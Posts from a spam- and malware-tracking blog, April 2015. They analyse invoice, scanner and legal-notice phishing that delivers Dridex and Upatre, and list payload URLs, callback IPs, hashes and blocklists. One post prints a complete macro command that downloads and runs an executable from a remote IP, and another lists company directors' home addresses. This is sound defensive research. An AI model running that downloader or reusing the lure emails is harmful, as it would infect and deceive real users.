Sponsored by..

Wednesday, 15 April 2015

pdatamc.org / publicdmc.cn domain scam

This email message is actually a spam promoting a long-running scam where an unscrupulous party is attempting to sell overpriced and worthless domains to their intended victim.

From: Bruce Lo [mailto:bruce@publicdmc.cn]
Date: 14:59 Wednesday 15th April 2015
Subject: [victimdomain] Registration
Priority: High

To whom it may concern:

We are the Registrars accredited by China Internet Network Information Center. We have something to confirm with you. On April 7, 2015, we received an application in which a company by the name Presg Group applied to register " victimdomain " as their Brand Name and some Asia domain names through our firm.

Now we are handling this registration. After our initial checking, we found that the name are identical to your company's. We need to check with you whether your company has authorized that company to register these names. If you have authorized this, we will finish the registration at once. If not, please let us know within 7 workdays, in which case we will dicuss the matter more thoroughly. If not otherwise advised within that time limit we will proceed with the registration for Presg Group . We will be waiting for your reply. Have a nice day!

Best Regards

Bruce Lo
Registration Dept.
Phone: +86.55165184482
Fax:    +86.55165128724
Website:http://www.pdatamc.org/
Address: No. 789, XiYou Road, Zhengwu District, HeFei City, AnHui Province, China  
I've explained this particular scam so many times that I made a video explaining it..

businessexecutives01.com / theexecutivesbrand.com scam

This is a grubby "Who's Who scam"

From:    Sterling Hudson
Date:    15 April 2015 at 14:12
Subject:    Re: you were chosen as a potential candidate...

Dear,

You were recently chosen as a potential candidate to represent 2015 Worldwide Branding Registry of Distinguished Professionals and Executives.
We are pleased to inform you that your candidacy was formally approved May 2nd. Congratulations. The Publishing Committee selects potential candidates based not only upon their current standing, but focusing as well on criteria from executive and professional directories, associations, and trade journals.
Given your background, the Director believes your profile makes a fitting addition to our publication. There is no fee nor obligation to be listed. As we are working off of secondary sources, we must receive verification from you that your profile is accurate. After receiving verification, we will validate your registry listing within seven business days.
Once finalized, your listing will share prominent registry space with thousands of fellow accomplished individuals across the globe, each representing accomplishments within their own geographical area.
To verify your profile and accept the candidacy, please visit here.

Our registration deadline for this year's candidates is May 28th. To ensure you are included, we must receive your verification on or before this date. On behalf of our Committee, I salute your achievement and look forward to welcoming you to our association.
Sincerely,

Benjamin Morisson
Editor in Chief
Worldwide Selection Committee 2015

If you don't want to receive emails any more, please Unsubscribe
The link in the email does to www.businessexecutives01.com:8133/wayne/ which is an anonymously registered domain hosted on a spam server at 123.249.39.89 in China. The links on businessexecutives01.com  website all lead to theexecutivesbrand.com which is basically a mirror of the content.

There are a number of this scammy spam sites on the same servers. I recommend that you block all the following sites as spam:

businessexecutives01.com
dirtyemojis.ru
foldemholdem.com
ironchampusa.ru
truepeptide.net
theexecutivesbrand.com




Malware spam: "Invoice from Living Water" / "Natalie [mailto:accounts@living-water.co.uk]"

This fake invoice does not come from Living Water, but instead is a simple forgery with a malicious attachment.
From: Natalie [mailto:accounts@living-water.co.uk]
Sent: Wednesday, April 15, 2015 9:43 AM
Subject: Invoice from Living Water

Dear Customer  :

Your invoice is attached.  Please remit payment at your earliest convenience.

Thank you for your business - we appreciate it very much.

Sincerely,

Living Water
0203 139 9051
In the sample that I received, the attachment was named Inv_300846161_from_Living_W.doc which has a VirusTotal detection rate of 1/55. This contains a malicious macro [pastebin] which downloads a file from the following location:

http://adlitipcenaze.com/353/654.exe

There are probably other download locations, but they will all have the same payload. This is saved as %TEMP%\rizob1.0.exe and currecntly has a detection rate of 6/57. Automated analysis tools [1] [2] [3] show attempted connections to the following IPs:

89.28.83.228 (StarNet, Moldova)
78.24.218.186 (TheFirst-RU, Russia)
37.140.199.100 (Reg.Ru Hosting, Russia)

According to this Malwr report it drops a Dridex DLL with a detection rate of 4/57.

Recommended blocklist:
89.28.83.228
78.24.218.186
37.140.199.100

MD5s:
2ecf5e35d681521997e293513144fd80
9932c4a05ca0233f27b0f8404a8dc5bd
68e1e7251314944a4b4815adced70328

Tuesday, 14 April 2015

Digital Networks CJSC aka DINETHOSTING and 79.137.224.0/20

A few years ago Digital Networks CJSC (DINETHOSTING) was hosting a significant amount of toxic crap in the 79.137.224.0/20 range (examples: [1] [2] [3] [4]). Although they still host a significant amount of crap, this particular range now looks almost clean and does have quite a few legitimate (mostly Russian) customers on it.

I ran an analysis on 1672 sites [csv] in this range and only two were tagged as malicious by Google and none by SURBL, which is actually less than I would expect on a sample of this size. I note that many sites have reputational problems at WOT which seem to be because of an expired Spamhaus listing (see this example).

If you've blocked this /20 then I suggest that it is reasonably safe to unblock, although I would regard other DINETHOSTING ranges with caution.

Malware spam: "Kairen Varker [mailto:kvarker@notifications.kashflow.com]" / "Invoice from"

This fake invoice has a malicious attachment:
From: Kairen Varker [mailto:kvarker@notifications.kashflow.com] On Behalf Of Kairen Varker
Sent: Tuesday, April 14, 2015 9:26 AM
Subject: Invoice from

I have made the changes need and the site is now mobile ready . Invoice is attached
In this case the attachment is called Invoice-83230.xls which is currently undetected by AV vendors. It contains this malicious macro [pastebin] which downloads a component from the following location (although there are probably more than this):

http://925balibeads.com/94/053.exe

This is saved as %TEMP%\stepk1.5a.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] [3] [4] shows the malware phoning home to:

78.24.218.186 (TheFirst-RU, Russia)
176.67.160.187 (UK2, UK)
87.236.215.151 (OneGbits, Lithuania)
154.69.104.137 (Sandton Telkom, South Africa)
107.191.46.222 (Vultr Holdings / Choopa LLC, Canada)
94.23.171.198 (OVH, Czech Republic)
74.119.194.18 (RuWeb Corp, US)
37.140.199.100 (Reg.Ru Hosting, RUssia)
89.28.83.228 (StarNet SRL, Moldova)

The Malwr report shows that among other files it drops a malicious Dridex DLL with a detection rate of 2/57.

Recommended blocklist:
78.24.218.186
184.25.56.188
176.67.160.187
87.236.215.151
154.69.104.137
107.191.46.222
94.23.171.198
74.119.194.18
37.140.199.100
89.28.83.228

MD5s:
e46dcc4a49547b547f357a948337b929
1748fc9c5c0587373bf15a6bda380543
1e010195d2e5f6096095078482624995

Thursday, 9 April 2015

Namailu.com spam

This spam has been appearing in my inbox for several days now:

From:    Shana Felton [9k7bf-2976014268@serv.craigslist.org]
Date:    9 April 2015 at 19:10
Subject:    New commitment invitation - [redacted]

Hi Namailu User,
You have a commitment invitation from Sarah Smith. To view your commitment invitation please follow this link:
Copyright © 2015, Namailu Online Ltd
|
|
|

I've never heard of Namailu so I assumed that it was a virus. I couldn't detect a malicious payload though, and further investigation indicates that this is a wannabe dating site that appears to be promoting itself through spam.

Clicking through the link leads to https://www.namailu.com/Smith.Sarah.206

Obviously we are lead to believe that the girl in the picture is sending the message.

Reverse image search comes up with no matches, unusually. Goodness knows how many people there are called "Sarah Smith" in New Zealand. Probably quite a lot.

The spam messages come from a range of IPs that are also used to spam out promotional material for a site called dirtyemojis.com (using a redirector of dirtyemojis.ru). The spam is sent from a range of Chinese IP addresses, including:

115.221.50.15
115.221.50.179
115.221.51.238
115.221.53.228
115.221.54.15
115.221.55.46
115.221.56.29
115.221.60.212
115.221.63.38

In each case the "From" address is fake, for example:

Shana Felton [9k7bf-2976014268@serv.craigslist.org]
Nestor Blackwell [orders@floristexpress.com.au]
Shirley Webb [rio@e-mail.com]
Mauricio Lundy [marilyndukacz@aol.com]
Edward Ybarra [v.wittke@schafmail.de]

A quick search of the body text of the message shows that it has been spammed out quite widely.

Although the site uses HTTPS, there is no ownership information. The WHOIS details are also anonymised, which is always a red flag for anything handling your personal data.

There are no contact details on the website, but the "User Agreement" page says that it is owned by Namailu Online Limited of New Zealand. It turns out that the New Zealand Companies Office offers very good information, and this is actually a real company.

The two directors listed are:

Philipp Rudolf RIPA
26 Whitehills Road, Rd 1, Silverdale, 0994 , New Zealand

Rudolf SAYEGH
111 Pilkington Road, Panmure, Auckland, 1072 , New Zealand

Incidentally, if you want to serve legal papers then the Pilkington Road address is the one to use. There aren't many people by the name of "Philipp Ripa" or "Rudolf Sayegh" in New Zealand, that is for sure.

A look at their Facebook page shows some information about the product being in development, but no other real details. Their spares Twitter page at @namailu shows they have four followers. I am one of them.


I'm going to be charitable and suggest that the people running Namailu have contracted another party to do the spamming and are possibly unaware of what is going on.

However, this clueless approach does not bode well for a site that deals in highly personal data and my personal opinion would be to give this particular outfit a very wide berth.

Malware spam: "Matthews, Tina [tina@royalcarson.com]" / "Credit card transaction" / "Royal Wholesale Electric"

This fake financial spam does not come from Royal Wholesale Electric but it is instead a simple forgery with a malicious attachment.
From:    Matthews, Tina [tina@royalcarson.com]
Date:    9 April 2015 at 10:48
Subject:    Credit card transaction

Here is the credit card transaction that you requested.

Tina Matthews
Royal Wholesale Electric
2801 East 208th Street
Carson, CA 90810
310-637-6377 Phone
310-603-9883 Fax
tina@royalcarson.com
Running in parallel to this is another claiming to be from UK firm AquaAid which has been going on for a long time. In the first case the attachment is 20150326094147512.doc and in the second it is CAR015890001.doc, but they are the same malicious document.

The document is currently undetected by AV vendors and contains a malicious macro [pastebin] which downloads a binary from:

http://onemindgroup.com/366/114

This is saved as %TEMP%\ittext1.5.exe and has a VirusTotal detection rate of 3/49. Automated analysis tools [1] [2] [3] [4] show traffic to the following IPs:

91.230.60.219 (Docker Ltd, Russia)
66.110.179.66 (Microtech Tel, US)
176.108.1.17 (Cadr-TV LLE TVRC, Ukraine)
202.44.54.5 (World Internetwork Corporation, Thailand)
87.236.215.103 (OneGbits, Lithuania)
128.199.203.165 (DigitalOcean Cloud, Singapore)
128.135.197.30 (University Of Chicago, US)
185.35.77.160 (Corgi Tech Limited, UK)
46.101.38.178 (Digital Ocean, UK)
95.163.121.51 (Digital Networks CJSC aka DINETHOSTING, Russia)
92.41.107.253 (Hutchison 3G, UK)

According to the Malwr report  is also drops another variant of the downloader [VT 4/57] and a Dridex DLL [VT 4/57].

Recommended blocklist:
91.230.60.219
66.110.179.66
176.108.1.17
202.44.54.5
87.236.215.103
128.199.203.165
128.135.197.30
185.35.77.160
95.163.121.0/24

MD5s:
03ab12e578664290fa17a1a95abd71c4
48f39c245ec68bdbe6c0c93313bc8f74
90ebd79d1eac439c9c4ee1a056c9e879
62f33c7b850845cb66dcaa69e2af4443



Wednesday, 8 April 2015

Malware spam: "Invoice from COMPANY NAME" / 31.24.30.12 / 46.30.43.102

This Dridex spam takes a slightly different approach from other recent ones. Instead of attaching a malicious Office document, it downloads it from a compromised server instead.

The example I saw read:
From:    Mitchel Levy
Date:    8 April 2015 at 13:45
Subject:    Invoice from MOTHERCARE

Your latest invoice is now available for download. We kindly advise you to pay the invoice in time.

Download your invoice here.

Thanks for attention. We appreciate your business.
If you have any queries, please do not hesitate to contact us.

Mitchel Levy, MOTHERCARE
The link in the email has an address using the domain afinanceei.com plus a subdomain based on the recipients email address. It also has the recipients email address embedded in the URL, for example:

http://victimbfe.afinanceei.com/victim@victim.domain/

This is hosted on 31.24.30.12 (Granat Studio / Tomgate LLC, Russia) and it leads to a landing page that looks like this:

I guess perhaps the bad guys didn't notice "Califonia Institute of Technology" written behind "Information Management Systems & Services". The link in the email downloads a file from:

http://31.24.30.12/api/Invoice.xls

At the moment the download server seems very unstable and is generating a lot of 500 errors. Incidentally, http://31.24.30.12/api/ shows a fake page pretending to be from Australian retailer Kogan.



As you might guess, Invoice.xls contains a malicious macro [pastebin] but the real action is some data hidden in the spreadsheet itself:


That's pretty easy to decode, and it instructs the computer to download a malicious binary from:

http://46.30.43.102/cves/kase.jpg

This is saved as %TEMP%\dfsdfff.exe. Unsurprisingly, 46.30.43.102 is another Russian IP, this time EuroByte LLC.

This binary has a VirusTotal detection rate of 6/57. Automated analysis tools [1] [2] [3] [4] show it communicating with the following IPs:

109.74.146.18 (VNET a.s., Bulgaria)
176.81.92.142 (Telefonica, Spain)
147.96.6.154 (Universidad Complutense De Madrid, Spain)
199.201.121.169 (Synaptica, Canada)
210.205.126.189 (Nowonwoman, Korea)
37.58.49.37 (Leaseweb, Germany)
87.117.229.29 (iomart, UK)
108.61.189.99 (Choopa LLC, US)
116.75.106.118 (Hathway, India)
107.191.46.222 (Choopa LLC, Canada)

In addition there are some Akamai IPs which look benign:

184.25.56.212
184.25.56.205
2.22.234.90

According to this Malwr report it drops several files including a malicious Dridex DLL which is the same one found in this attack.

Recommended blocklist:
109.74.146.18
176.81.92.142
147.96.6.154
199.201.121.169
210.205.126.189
37.58.49.37
87.117.229.29
108.61.189.99
116.75.106.118
107.191.46.222
46.30.43.102
31.24.30.12

MD5s:
e8cd8be37e30c9ad869136534f358fc5
671c65cedc8642adf70ada3f74d5da19
a4af11437798b7de5a0884623ed42478

UPDATE 1:

There is at least one other server at  95.163.121.22 (Digital Networks CJSC aka DINETHOSTING, Russia) being used as a location to click through to (I recommend you block the entire 95.163.121.0/24 range). Between those two servers I can see the domains listed below in use. I suspect that there are others given the limited alphabetic range

abiliingfinance.com
abilingffinance.com
abilingfienance.com
abilingfinaance.com
abilingfinancee.com
abilingfinancey.com
abilingfinnance.com
abilingggfinance.com
abilinngfinance.com
afinanccebifling.com
afinanccebiling.com
afinanceas.com
afinancebbi.com
afinancebill.com
afinancecc.com
afinanceebb.com
afinanceei.com
afinancei.com
afinanceobilhing.com
afinanceobiling.com
afinanceqbilzing.com
afinancesh.com
afinancewbidling.com
afinanceyer.com
afinancrebiling.com
afinancrebixling.com
afinandebiling.com
afinangebiling.com
afinangebilqing.com
afinanrebileing.com
afinanrebiling.com
afinansebiling.com
afinansebilling.com
afinanwebiling.com
afinanwebilsing.com
asfinancebbi.com
asfinancebill.com
asfinancecc.com
asfinancee.com
asfinanceebb.com
asfinanceei.com
asfinancei.com
asfinancesh.com
asfinanceyer.com
assfinanceas.com
bbbilingfinancee.com
bbiliingfinance.com
bbilingffinance.com
bbilingfienance.com
bbilingfinaance.com
bbilingfinancee.com
bbilingfinancey.com
bbilingfinnance.com
bbilingggfinance.com
bbilinngfinance.com
bbillingfinance.com
biliingfinance.com
bilingffinance.com
bilingfienance.com
bilingfinaance.com
bilingfinancee.com
bilingfinancey.com
bilingfinnance.com
bilingggfinance.com
bilinngfinance.com
cfinanccebifling.com
cfinanceobilhing.com
cfinanceqbilzing.com
cfinancewbidling.com
cfinancrebixling.com
cfinandebilping.com
cfinangebilqing.com
cfinansebilling.com
cfinanwebilsing.com
financcebifling.com
financcebiling.com
financeobilhing.com
financeobiling.com
financeqbilzing.com
financewbidling.com
financewbiling.com
financrebiling.com
financrebixling.com
finandebilping.com
finangebiling.com
finangebilqing.com
finanrebileing.com
finanrebiling.com
finansebiling.com
finansebilling.com
finanwebiling.com
finanwebilsing.com

Malware spam: "TWO UNPAID INVOICES" / "Wayne Moore [wayne44118@orionplastics.net]"

This fake invoice spam is not from Orion Plastics but is instead a simple forgery with a malicious attachment.

From:    Wayne Moore [wayne44118@orionplastics.net]
Date:    8 April 2015 at 09:03
Subject:    TWO UNPAID INVOICES

4/3----- LAST WEEK I CALLED REGARDS TWO UNPAID INVOICES FROM JAN 2015
INVOICE # 029911  DATED 1/7/15 FOR $840.80
INVOICE # 030042  DATED 1/30/15 FOR $937.00

PLEASE ADVISE WHEN  YOU SENT CHECK AND TO WHAT ADDRESS

I HAVE ATTACHED THE NEW REMIT TO ADDRESS IN CASE YOU DON’T HAVE IT

REGARDS-WAYNE
In this case the email was malformed and the attachment REMITTANCE & WIRE TRANSFER ADDRESS.DOC wasn't downloadable (this may be a temporary problem). The document has a detection rate of just 1/56. Extracting the document revealed this malicious macro [pastebin] which downloads an additional component from:

http://fzsv.de/11/004.exe

There are usually other download locations in different variants of the document, but the downloaded executable will be the same. The executable is saved as %TEMP%\c48.exe. This malicious binary has a detection rate of 6/54. Automated analysis tools [1] [2] [3] shows it phoning home to the following IPs:

37.140.199.100 (Reg.Ru Hosting, Russia)
176.67.160.187 (UK2, UK)
81.148.134.130 (BT, UK)
46.228.193.201 (Aqua Networks Ltd, Germany)
83.136.80.46 (myLoc, Germany)

The Malwr report shows it attempting to connect to a couple a Akamai IPs that I suspect are NOT malicious and would cause collateral damage if blocked:

90.84.136.185
184.25.56.220

According to the same Malwr report it drops a Dridex DLL with a detection rate of 4/57.

Recommended blocklist:
37.140.199.100
176.67.160.187
81.148.134.130
46.228.193.201
83.136.80.46

MD5s:
3e3a09644170ad3184facb4cace14f8a
671c65cedc8642adf70ada3f74d5da19
14c2795bcc35c3180649494ec2bc7877

Tuesday, 7 April 2015

Malware spam: "COMPANY NAME has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]"

This fake legal spam comes with a malicious attachment:

From:    Isiah Mosley [Rosella.e6@customer.7starnet.com]
Date:    7 April 2015 at 14:09
Subject:    Schroders has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]

Schroders,Isiah Mosley

The company name is randomly chose. In the above example the attachment was called VM1993LVW.doc which matched the reference in the subject. The Word document contains a malicious macro [pastebin] which executes the following command:
cmd.exe /c @echo dim gyuFYFGuigddd: Set gyuFYFGuigddd = createobject("Microsoft.XMLHTTP")>gyuFYFGuig.vbs & @echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Open "GET", "http://185.39.149.178/aszxmy/image04.gif", False>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Send>>gyuFYFGuig.vbs & @echo Set environmentVars = WScript.CreateObject("WScript.Shell").Environment("Process")>>gyuFYFGuig.vbs & @echo tempFolder = environmentVars("TEMP")>>gyuFYFGuig.vbs & @echo Fileopen = tempFolder + "\dfsdfff.exe">>gyuFYFGuig.vbs & @echo with bStrm>>gyuFYFGuig.vbs & @echo    .type = 1 >>gyuFYFGuig.vbs & @echo     .open>>gyuFYFGuig.vbs & @echo     .write gyuFYFGuigddd.responseBody>>gyuFYFGuig.vbs & @echo     .savetofile Fileopen, 2 >>gyuFYFGuig.vbs & @echo end with>>gyuFYFGuig.vbs & @echo Set GBIviviu67FUGBK = CreateObject("Shell.Application")>>gyuFYFGuig.vbs & @echo GBIviviu67FUGBK.Open Fileopen>>gyuFYFGuig.vbs & cscript.exe gyuFYFGuig.vbs
I can't be bothered to work out all of the crap with the .vbs which may of may not be importance. Along with an alternate macro, I can see download locations from:

http://185.39.149.178/aszxmy/image04.gif
http://148.251.87.253/aszxmy/image04.gif

For the record,  185.39.149.178 is OOO A.S.R. in Russia and 148.251.87.253 is Hetzner in Germany.

The downloaded .GIF file is definitely not a GIF and is instead an executable that gets saved as %TEMP%\dfsdfff.exe. This has a VirusTotal detecton rate of 2/56. Automated analysis tools [1] [2] [3] show the malware phoning home to:

151.252.48.36 (Vautron Serverhousing, Germany)

According to the Malwr report, it drops a DLL with a detection rate of 2/56 which is most likely a Dridex DLL.

Recommended blocklist:
151.252.48.36
148.251.87.253
185.39.149.178

MD5s:
a4e14c88da9e1a74cd7c26ded99b6a0a
c86a9d012e372d0c3a82b14978ffa1f0

Malware spam: "Order Confirmation Order BNTO056063 06/04/2015" / "Sales-BNThermic [Sales@bnthermic.co.uk]"

This fake financial spam does not come from BN Thermic but is instead a simple forgery with a malicious attachment:

From:    Sales-BNThermic [Sales@bnthermic.co.uk]
Date:    7 April 2015 at 09:48
Subject:    Order Confirmation Order BNTO056063 06/04/2015

Thank you for your order, please find attached confirmation.

Best Regards


BN Thermic

In all cases, the attached file is called BNTO056063.DOC, but there are actually at least four different variants with one of four malicious macros [1] [2] [3] [4] which then download a component from one of the following locations:

http://heubett.de/220/68.exe
http://fzsv.de/220/68.exe
http://deosiibude.de/deosiibude.de/220/68.exe
http://bewakom.de/220/68.exe


This file is then saved as %TEMP%\wabat1.1a.exe. This executable is the same one as used in this attack and the payload is the Dridex banking trojan.

Malware spam: "EBOLA INFORMATION" / "noreply@ggc-ooh.net"

This fake medical email contains a malicious attachment. It's a novel approach by the bad guys, but I doubt that many people will find it believable enough to click.

From:    noreply@ggc-ooh.net
Reply-To:    noreply@ggc-ooh.net
Date:    7 April 2015 at 08:58
Subject:    EBOLA INFORMATION

This email is generated from an unmanned mailbox. Dr N J Gaw can be contacted via noreply@ggc-ooh.net

PLEASE SEE THE ATTACHED CORRESPONDENCE FOR YOUR INFORMATION.

THANK YOU.
Attached is a file 30.03.15 Ebola Virus (2).doc which contains this malicious macro [pastebin] which is contains a lot of girls names as variables (which makes a nice change from the randomly-generated stuff I suppose).

When decoded the macro downloads a component from:

http://deosiibude.de/deosiibude.de/220/68.exe

VirusTotal submissions seem to be down at the moment, so I can't tell you what the detection rate is. Automated analysis tools [1] [2] [3] show it phoning home to the following IPs (ones in bold are most likely static, the others look to be dynamic):

37.140.199.100 (Reg.Ru Hosting, Russia)
46.228.193.201 (Aqua Networks Ltd, Germany)
130.241.92.141 (Goteborgs Universitet, Sweden)
46.101.49.125 (Digital Ocean Inc, UK)
122.167.6.68 (ABTS, India)
5.100.249.215 (O.M.C. Computers & Communications Ltd, Israel)

85.255.173.109 (Satnet Ltd, Bulgaria)
217.37.39.235 (BT Broadband, UK)
81.190.50.232 (Multimedia Polska S. A., Poland)
89.228.15.18 (Multimedia Polska S. A., Poland)

According to the Malwr report it drops a whole load of files including what is probably a Dridex DLL.

Recommended blocklist:
37.140.199.100
46.228.193.201
130.241.92.141
46.101.49.125
122.167.6.68
85.255.173.109
5.100.249.215
217.37.39.235
81.190.50.232
46.228.193.201
89.228.15.18


MD5s:
E4CC002A95CAAF4481CB7140BBE96C58
C86A9D012E372D0C3A82B14978FFA1F0
F98A674A5FA473AC9BF738636FF6374E



Thursday, 2 April 2015

Malware spam: "Copy invoices Snap on Tools Ltd" / "Allen, Claire [Claire.Allen@snapon.com]"

This fake invoice does not come from Snap On Tools, but is instead a simple forgery.

From:    Allen, Claire [Claire.Allen@snapon.com]
Date:    24 February 2015 at 14:41
Subject:    Copy invoices Snap on Tools Ltd

Good Afternoon

Attached are the copy invoices that you requested.

Regards

Claire

Your message is ready to be sent with the following file or link attachments:

SKETTDCCSMF14122514571


Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments.  Check your e-mail security settings to determine how attachments are handled.
I have only seen one copy of this with an attachment SKETTDCCSMF14122514571.doc which contains this malicious macro [pastebin], which downloads a further component from:

http://ws6btg41m.homepage.t-online.de/025/42.exe

This executable has a detection rate of 5/57. Various automated analyses [1] [2] [3] [4] show attempted communications to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
72.167.62.27 (GoDaddy, US)
62.113.219.35 (23Media GmbH, Germany)
46.101.49.125 (Digital Ocean, UK)
130.241.92.141 (Goteborgs Universitet, Sweden)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc., US)
94.23.173.233 (OVH, Czech Republic)
14.98.243.243 (Tata Indicom, India)
5.100.249.215 (O.M.C. Computers & Communications, Israel)
62.113.223.227 (23Media GmbH, Germany)

According to this Malwr report  it drops another version of the downloader called edg1.exe [VT 4/57] and a malicious Dridex DLL [VT 2/57].

Recommended blocklist:
91.242.163.70
72.167.62.27
62.113.219.35
46.101.49.125
130.241.92.141
198.245.70.182
94.23.173.233
14.98.243.243
5.100.249.215
62.113.223.227

MD5s:
dc92858693f62add2eb4696abce11d62
6fb2f86986e074cf44bd4c9f68e9822e
9565b17a4f1221fee473d0d8660dc26d
62e780a6237c6f9fd0a8e16a2823562d





Malware spam: "Scanned document from HP/Brother/Epson Scanner [87654321]"

These fake scanner emails follow a well-established pattern. Instead of containing a scanned document they have a malicious attachment.

Now.. if you are reading this then you are probably not the sort of person who would open an unsolicited message of this sort. Would you?

From:    Cindy Pate [Caroline.dfd@flexmail.eu]
Date:    2 April 2015 at 11:09
Subject:    Scanned document from HP Scanner [66684798]

Reply to: HP-Scanner@flexmail.eu
Model:KX-240NGZDC
Location: 1st Floor Office

File Format: DOC (Medium)
Resolution: 300dpi x 300dpi

Attached file is scanned document in DOC format.
Use Microsoft Office Word  of Microsoft Corporation to view the document.

----------

From:    Sterling Hoffman [Lara.dc4@astroexports.com]
Date:    2 April 2015 at 11:00
Subject:    Scanned document from Brother Scanner [07623989]

Reply to: Brother-Scanner@astroexports.com
Model:CG-240NWDUL
Location: 1st Floor Office

File Extension: DOC (Medium)
Resolution: 300dpi x 300dpi

Attached file is scanned document in DOC format.
Use Microsoft Office Word  of Microsoft Corporation to view the document.

----------

From:    Manuel Velez [Yesenia.10@acv.nl]
Date:    2 April 2015 at 12:04
Subject:    Scanned document from Epson Scanner [81829722]

Reply to: Epson-Scanner@acv.nl
Model:JS-240NRZYV
Location: 1st Floor Office

File Format: DOC (Medium)
Resolution: 300dpi x 300dpi

Attached file is scanned document in DOC format.
Use Microsoft Office Word  of Microsoft Corporation to view the document.

I have seen three different malicious attachments with low detection rates [1] [2] [3] which appear to contain one of two macros [1] [2] which download a further component from one of the following locations:

http://93.158.117.163:8080/bz1gs9/kansp.jpg
http://78.47.87.131:8080/bz1gs9/kansp.jpg


Those servers are almost definitely malicious in other ways, the IPs are allocated to:

93.158.117.163 (Aitos Svenska / Port80 , Sweden)
78.47.87.131 (Hetzner, Germany)

This is then saved as %TEMP%\sdfsdffff.exe which has a VirusTotal detection rate of just 1/56. Automated analysis [1] [2] [3] indicates that it calls home to:

188.120.225.17 (TheFirst-RU, Russia)
92.63.88.83 (MWTV, Latvia)
121.50.43.175 (Tsukaeru.net, Japan)
95.163.121.33 (Digital Networks CJSC aka DINETHOSTING, Russia)
82.151.131.129 (Doruknet, Turkey)
46.19.143.151 (Private Layer Inc, Switzerland)
45.55.154.235 (Digital Ocean, US)
195.130.118.92 (University Of Ioannina, Greece)
199.201.121.169 (Synaptica, Canada)
95.211.168.10 (Leaseweb, Netherlands)
222.234.230.239 (Hanaro Telecom, Korea)

Although the automated tools indicate that no files were dropped, the payload for this is almost definitely Dridex.

Recommended blocklist:
188.120.225.17
92.63.88.0/24
121.50.43.175
95.163.121.0/24
82.151.131.129
46.19.143.151
45.55.154.235
195.130.118.92
199.201.121.169
95.211.168.10
222.234.230.239
93.158.117.163
78.47.87.131

MD5s:
96f3aa2402daf9093ef0b47943361231
cff4b8b7f9adf1f5964b495a8116d196
68fb9aadda63d18f1b085d5bd8815223
64fa6501bd4d32b2958922598008ca96


Malware spam: "Sage Invoice [invoice@sage.com]" / "Outdated Invoice"

This fake financial email is not from Sage but is a simple forgery that leads to malware.

From:    Sage Invoice [invoice@sage.com]
Date:    2 April 2015 at 12:24
Subject:    Outdated Invoice

Sage Logo



 Sage Account & Payroll

You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link bellow or click here to view/download your account invoice:


If we hold any information about you which is incorrect or if there are any changes to your details please let us know by so that we can keep our records accurate and up to date. If you would like to update your records or see a copy of the information that we hold about you, you can contact us at Data Protection Officer, Sage (UK) Ltd, North Park, Newcastle-upon-Tyne, NE13 9AA or by email to digital@sage.com. If you request a copy of your information you will need to pay a statutory fee which is currently £10.

The contents of this email and any attachments are confidential. They are intended for the named recipient(s) only. If you have received this email in error please notify the system manager or the sender immediately and do not disclose the contents to anyone or make copies.

We have communicated this information with users as well, and we will continue to communicate with you through email as your transition continues.

This email was sent to: [redacted]

This email was sent by: Sage UK Limited
NC1-002-08-25,
Newcastle upon Tyne., North Park, NE13 9AA, United Kingdom

Privacy and Security
Keeping your financial information secure is one of our most important responsibilities. For an explanation of how we manage customer information, please read our Privacy Policy. You can also learn how Sage UK Limited keeps your personal information secure and how you can help protect yourself.

The link in the email does not in face go to Sage, but it downloads a file from hightail.com. The payload is identical to the one used in this concurrent spam run.

Malware spam: "invoice@bankline.ulsterbank.ie" / "Outstanding invoice"

This fake banking email leads to malware.

From:    invoice@bankline.ulsterbank.ie [invoice@bankline.ulsterbank.ie]
Date:    2 April 2015 at 11:46
Subject:    Outstanding invoice

Dear [victim],


Please find the attached copy invoice which is showing as unpaid on our ledger.

To download your invoice please click here

I would be grateful if you could look into this matter and advise on an expected payment date .

Courtney Mason

Credit Control

Tel: 0845 300 2952 

The link in the email leads to a download location at hightail.com (the sample I saw downloaded from https://www.hightail.com/download/e?phi_action=app/directDownload&fl=SWhZekZucVhVbTlFQlFJWjA4bnVnVE9yZWt5UmdteDRsUjJuWENHRzVZbz0) which is a file called Doc_0062119-LQ.zip which in turn contains the malicious executable Doc_0062119-LQ.scr.

The executable has a VirusTotal detection rate of 3/57 and has characteristics that identify it as Upatre. Automated analysis tools [1] [2] [3] [4] [5] show that it downloads additional components from:

eduardohaiek.com/images/wicon1.png
edrzambrano.com.ve/images/wicon1.png

 It also POSTs data to 141.105.141.87 (Makiyivka Online Technologies Ltd, Ukraine) in a characteristic Upatre manner:

http://141.105.141.87:13840/0204uk11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK

According to the Malwr report, the downloader drops a file gkkjxyz22.exe which has a detection rate of 2/57. This is probably the Dyre banking trojan.

Recommended blocklist:
141.105.140.0/22
 eduardohaiek.com
edrzambrano.com

MD5s:
4c666564c1db6312b9f05b940c46fa9a
876900768e06c3df75714d471c192cc6

Wednesday, 1 April 2015

Malware spam: "Your Remittance Advice COMPANY NAME"

Yet another malware spam run today, this time from randomly-named but legitimate companies, for example:

From:    Kate Coffey
Date:    1 April 2015 at 15:00
Subject:    Your Remittance Advice PEEL SOUTH EAST

Dear sir or Madam,

Please find attached a remittance advice (JT934IYIP.doc) for your information.
Should you need any further information, please do not hesitate to contact us.

Best regards
PEEL SOUTH EAST

Attached is a Word document with a filename matching the body one in the text. Every email attachment we have seen so far is slightly different, but there seem to be just two different malicious macros [1] [2] [pastebin] which download a component from one of the following locations:

http://31.41.45.175/sqwere/casma.gif
http://91.242.163.78/sqwere/casma.gif


Those servers are almost certainly entirely malicious, with IPs assigned to:

31.41.45.175 (Relink Ltd, Russia)
91.242.163.78 (Sysmedia, Russia)

This file is saved as %TEMP%\DOWUIAAFQTA.exe and has a VirusTotal detection rate of 4/49. Automated analysis tools [1] [2] [3] show attempted connections to:

188.120.225.17 (TheFirst-RU, Russia)
45.55.154.235 (Digital Ocean, US)
188.126.72.179 (Portlane AB, Sweden)
1.164.114.195 (Data Communication Business Group, Taiwan)
